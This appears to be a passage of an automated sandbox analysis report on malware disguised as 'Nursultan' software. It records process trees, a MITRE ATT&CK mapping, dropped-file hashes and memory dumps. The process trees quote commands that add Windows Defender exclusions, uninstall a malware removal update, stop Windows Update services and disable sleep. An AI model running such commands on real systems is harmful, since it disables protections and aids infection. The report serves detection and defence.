  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:1688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2868
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2804
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:2480
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:2456
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1692
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2496
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  PID:1744
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2112
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:300
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1880
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2556

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Drops file in System32 directory
PID:2460
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1268
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:1648
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2572
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  PID:1700
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2272
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:580
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1684
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2960
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2112
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1880
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1456

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Drops file in System32 directory
PID:2696
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2864
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2588
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:1756
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:940
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1868
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1496
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:1748
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2208
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:568
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2432
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2796

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Drops file in System32 directory
PID:1068
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2272
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:1592
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  PID:2736
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2960
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2576
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2008
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2712
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1956
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1260
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1704
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3000

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
1⤵
- Drops file in System32 directory
PID:1284
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  PID:288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2244
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2304
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:896
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1648
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3020
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2868
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2460
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1932
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2584
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2264
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Clo970qIBgnnA6J\Display\Display.png

Filesize
350KB

MD5
e7f00991a16faa22cfbe8239b6f46097

SHA1
2a9c457c5910494cf134f9623801dd006aeffd2b

SHA256
414261df149d67209aef29181044553bab6e1d0a4df42bb4b657a369404abe11

SHA512
83a937a08ae8408113bfbd5d5acd86011bceee8fee8edf544b954120ff23fdacef99f794096707b8e37de195cae03adc27fc2bad328186bc4048f2fbf57e0b4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\JLWDY9xSoL3Bn07

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

Filesize
1.9MB

MD5
0df0a039309525fd27e1b5e056c92b6a

SHA1
7551c27a9123cb56c4218647966a753794ac2961

SHA256
a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f

SHA512
2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

Download Submit
C:\Users\Admin\AppData\Local\Temp\f2hcm87TnFpfnKJ

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

Filesize
229KB

MD5
f0b33cc162bfd36a995b8c90cd8ebff1

SHA1
ca1ddef08d47fc15a44a2d651b61e3decce8ebc6

SHA256
6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0

SHA512
1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00673C0YIHMMRUYS4ASJ.temp

Filesize
7KB

MD5
5d0087f90c8e9525d1ccb6dbb45c2467

SHA1
42f5db43138f0516fdb5b304b28a70972fa99e77

SHA256
6d2ed2e3822c389a0ed5ce8bb00a8517fa433c26aea94416a71681733aaea2ca

SHA512
e62f0a35bfca02dbeb4a1fc48b00561fc70c49e0f284bcd455e49fec19dcb897c6cea15b9f741bb2159e512c839ad5506b25ff9731c2f65744f792a77cbf88a4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3020ae5f5feab1ba6ad73966003da64f

SHA1
5be5617de0df53aa472c4bf63d8cc4dd2fc40e0a

SHA256
14edac0c7b60be6e133b9714439fe6878353b20e4f447aa809e5b40415f138da

SHA512
747701d020d1cf232bd24e8b68f55422a11d68ddbc64748263531e453d8e7fac7ca8bbfd32636dc75f85e9f5d4b8a5906db5b40deaab575f8141ba4a1979b14b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
369911bc6340ab887133c7530a73c273

SHA1
de9f62de88d0db794204f6e5fee76437cb4a2a70

SHA256
626149013ade2acfdaeaca68cb42d77c1839ea42ce514b1c1f99d675259170ce

SHA512
010af74056d3d73dd20463ddebc42be77dd8d88722a635bd9744f80abee18651280295a376b53bfd3adb2adcc994385f8cd91395e43fc4207fb635e28b374fa6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk

Filesize
1KB

MD5
48fb4bc116a34e5506fc6a67592be100

SHA1
5ca5b72c7ff47a965d6d01ea1b7f8eb450278ad7

SHA256
cbd649cb0ff8f0b6eae32e49821849fefa62da20f98a1a90a9c92235b6b64bdd

SHA512
c784d74530f9c22ec9f343acedb24126ecd42a9cabd3c96ef87ba9ba11200dd21043ad25ee139c83994439c0c58d0f6d4309570c0ace9452219d9b339de1aaed

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
577f27e6d74bd8c5b7b0371f2b1e991c

SHA1
b334ccfe13792f82b698960cceaee2e690b85528

SHA256
0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9

SHA512
944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

Download Submit
C:\Windows\Temp\ceihoregnmpc.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

Filesize
2.5MB

MD5
a1d8db2a1ff742bc73dd5617083f5fde

SHA1
957b182d82efb40a36099dd886ad581977880838

SHA256
d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a

SHA512
0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

Download Submit
\Users\Admin\AppData\Roaming\svchost.exe

Filesize
255KB

MD5
9af17c8393f0970ee5136bd3ffa27001

SHA1
4b285b72c1a11285a25f31f2597e090da6bbc049

SHA256
71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019

SHA512
b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

Download Submit
memory/320-1309-0x0000000000EC0000-0x00000000010A8000-memory.dmp

Filesize
1.9MB

Download
memory/564-1408-0x0000000001310000-0x00000000014F8000-memory.dmp

Filesize
1.9MB

Download
memory/664-801-0x0000000000C40000-0x0000000000E28000-memory.dmp

Filesize
1.9MB

Download
memory/756-1399-0x00000000002C0000-0x0000000000300000-memory.dmp

Filesize
256KB

Download
memory/764-335-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/764-337-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/764-336-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/764-334-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/780-433-0x00000000010A0000-0x00000000010E0000-memory.dmp

Filesize
256KB

Download
memory/780-298-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/780-297-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/836-183-0x0000000000350000-0x0000000000390000-memory.dmp

Filesize
256KB

Download
memory/896-201-0x00000000001C0000-0x00000000003A8000-memory.dmp

Filesize
1.9MB

Download
memory/948-62-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/948-63-0x00000000003D0000-0x00000000003D8000-memory.dmp

Filesize
32KB

Download
memory/1072-639-0x0000000000F60000-0x0000000001148000-memory.dmp

Filesize
1.9MB

Download
memory/1092-731-0x0000000000CC0000-0x0000000000D00000-memory.dmp

Filesize
256KB

Download
memory/1220-1374-0x0000000000830000-0x0000000000A18000-memory.dmp

Filesize
1.9MB

Download
memory/1296-78-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/1320-331-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/1320-330-0x000000001B3B0000-0x000000001B692000-memory.dmp

Filesize
2.9MB

Download
memory/1368-442-0x0000000000CA0000-0x0000000000E88000-memory.dmp

Filesize
1.9MB

Download
memory/1372-1128-0x0000000000300000-0x00000000004E8000-memory.dmp

Filesize
1.9MB

Download
memory/1464-129-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/1464-128-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/1468-1208-0x0000000000D30000-0x0000000000F18000-memory.dmp

Filesize
1.9MB

Download
memory/1544-1063-0x00000000011F0000-0x00000000013D8000-memory.dmp

Filesize
1.9MB

Download
memory/1568-1098-0x00000000001D0000-0x00000000003B8000-memory.dmp

Filesize
1.9MB

Download
memory/1576-194-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
memory/1576-193-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/1584-222-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/1584-223-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/1616-289-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/1616-288-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/1620-688-0x0000000001070000-0x0000000001258000-memory.dmp

Filesize
1.9MB

Download
memory/1628-993-0x0000000000D70000-0x0000000000F58000-memory.dmp

Filesize
1.9MB

Download
memory/1748-79-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/1764-629-0x0000000000B90000-0x0000000000BD0000-memory.dmp

Filesize
256KB

Download
memory/1776-1508-0x0000000000B90000-0x0000000000D78000-memory.dmp

Filesize
1.9MB

Download
memory/1780-480-0x0000000001010000-0x00000000011F8000-memory.dmp

Filesize
1.9MB

Download
memory/1784-903-0x0000000000F70000-0x0000000001158000-memory.dmp

Filesize
1.9MB

Download
memory/1852-395-0x00000000013E0000-0x00000000015C8000-memory.dmp

Filesize
1.9MB

Download
memory/1984-582-0x0000000000970000-0x0000000000B58000-memory.dmp

Filesize
1.9MB

Download
memory/2040-303-0x0000000001020000-0x0000000001060000-memory.dmp

Filesize
256KB

Download
memory/2108-1238-0x00000000008E0000-0x0000000000AC8000-memory.dmp

Filesize
1.9MB

Download
memory/2128-100-0x0000000000080000-0x0000000000268000-memory.dmp

Filesize
1.9MB

Download
memory/2212-933-0x0000000000C90000-0x0000000000E78000-memory.dmp

Filesize
1.9MB

Download
memory/2216-180-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2248-0-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

Filesize
4KB

Download
memory/2248-1-0x000000013F8E0000-0x000000013FBE0000-memory.dmp

Filesize
3.0MB

Download
memory/2256-1538-0x0000000000990000-0x0000000000B78000-memory.dmp

Filesize
1.9MB

Download
memory/2272-413-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2272-414-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2320-150-0x0000000001E60000-0x0000000001E68000-memory.dmp

Filesize
32KB

Download
memory/2320-149-0x000000001B8B0000-0x000000001BB92000-memory.dmp

Filesize
2.9MB

Download
memory/2348-536-0x0000000000140000-0x0000000000328000-memory.dmp

Filesize
1.9MB

Download
memory/2376-171-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2376-166-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2400-1669-0x0000000000150000-0x0000000000338000-memory.dmp

Filesize
1.9MB

Download
memory/2408-1279-0x00000000011A0000-0x0000000001388000-memory.dmp

Filesize
1.9MB

Download
memory/2420-135-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/2452-1327-0x0000000000FF0000-0x0000000001030000-memory.dmp

Filesize
256KB

Download
memory/2528-41-0x0000000000F00000-0x00000000010E8000-memory.dmp

Filesize
1.9MB

Download
memory/2528-43-0x0000000005640000-0x00000000056F6000-memory.dmp

Filesize
728KB

Download
memory/2548-252-0x0000000000C50000-0x0000000000E38000-memory.dmp

Filesize
1.9MB

Download
memory/2548-1628-0x0000000001320000-0x0000000001508000-memory.dmp

Filesize
1.9MB

Download
memory/2584-1597-0x0000000000F90000-0x0000000001178000-memory.dmp

Filesize
1.9MB

Download
memory/2620-861-0x0000000001030000-0x0000000001218000-memory.dmp

Filesize
1.9MB

Download
memory/2736-963-0x0000000001350000-0x0000000001538000-memory.dmp

Filesize
1.9MB

Download
memory/2756-788-0x0000000000EF0000-0x0000000000F30000-memory.dmp

Filesize
256KB

Download
memory/2780-54-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2780-56-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2780-53-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2780-44-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2780-52-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2780-50-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2780-48-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2780-46-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2784-29-0x0000000000BD0000-0x0000000000C10000-memory.dmp

Filesize
256KB

Download
memory/2796-1158-0x0000000000A10000-0x0000000000BF8000-memory.dmp

Filesize
1.9MB

Download
memory/2804-770-0x0000000000280000-0x0000000000468000-memory.dmp

Filesize
1.9MB

Download
memory/2840-23-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2840-22-0x000000001B530000-0x000000001B812000-memory.dmp

Filesize
2.9MB

Download
memory/2848-1438-0x0000000000E60000-0x0000000001048000-memory.dmp

Filesize
1.9MB

Download
memory/2936-312-0x00000000009C0000-0x0000000000BA8000-memory.dmp

Filesize
1.9MB

Download
memory/2960-276-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2964-588-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2964-587-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/3004-8-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/3004-7-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/3004-6-0x0000000001DB0000-0x0000000001E30000-memory.dmp

Filesize
512KB

Download
memory/3020-740-0x0000000000320000-0x0000000000508000-memory.dmp

Filesize
1.9MB

Download
memory/3052-831-0x00000000002E0000-0x00000000004C8000-memory.dmp

Filesize
1.9MB

Download